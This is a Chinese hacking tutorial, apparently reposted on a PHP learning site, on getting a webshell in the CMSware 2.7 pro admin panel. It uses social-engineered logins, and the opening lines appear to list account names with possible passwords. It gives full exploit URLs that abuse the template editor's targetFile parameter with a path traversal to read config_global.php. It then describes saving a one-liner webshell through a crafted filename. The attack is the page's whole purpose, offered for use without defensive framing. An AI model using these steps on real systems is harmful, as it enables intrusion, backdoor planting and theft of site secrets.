网站地图    收藏   

主页 > 后端 > 网站安全 >

思维内容管理系统(CMSware 2.7 pro)后台拿Shell - 网站

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 阿易 9769887keio 编辑账号密码是社工的 不能上传图片 拿shell后台登陆界面后台不能上传图片模板管理 --公用模板随便点击一个 模板里面的文件 注意这个sid 特有的下面是用来列网站目录需...

阿易            9769887  
keio            编辑

账号密码是社工的   不能上传图片 拿shell  

后台登陆界面


后台不能上传图片




模板管理   --公用模板



随便点击一个 模板里面的文件 注意这个sid 特有的



下面是用来列网站目录  需要修改2个地方



列出了网站根目录

http://www.xxxx.net/cms/admin/admin_tpl.php?sId=ed96865b949892f2a1bcb5241c9852dc&o=editor_frameset&extra=edit&PATH=&targetFile=../../config/config_global.php
可以查看源代码





远远不止列源码   因为是linux 系统   又不让建立php的文件 就在
http://www.2cto.com /cms/admin/admin_tpl.php?sId=ed96865b949892f2a1bcb5241c9852dc&o=editor_frameset&extra=edit&PATH=&targetFile=../../config/config_global.php.111
9.jpg
这样提示访问错误 不要管他


照样写入我们的一句话

保存




自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论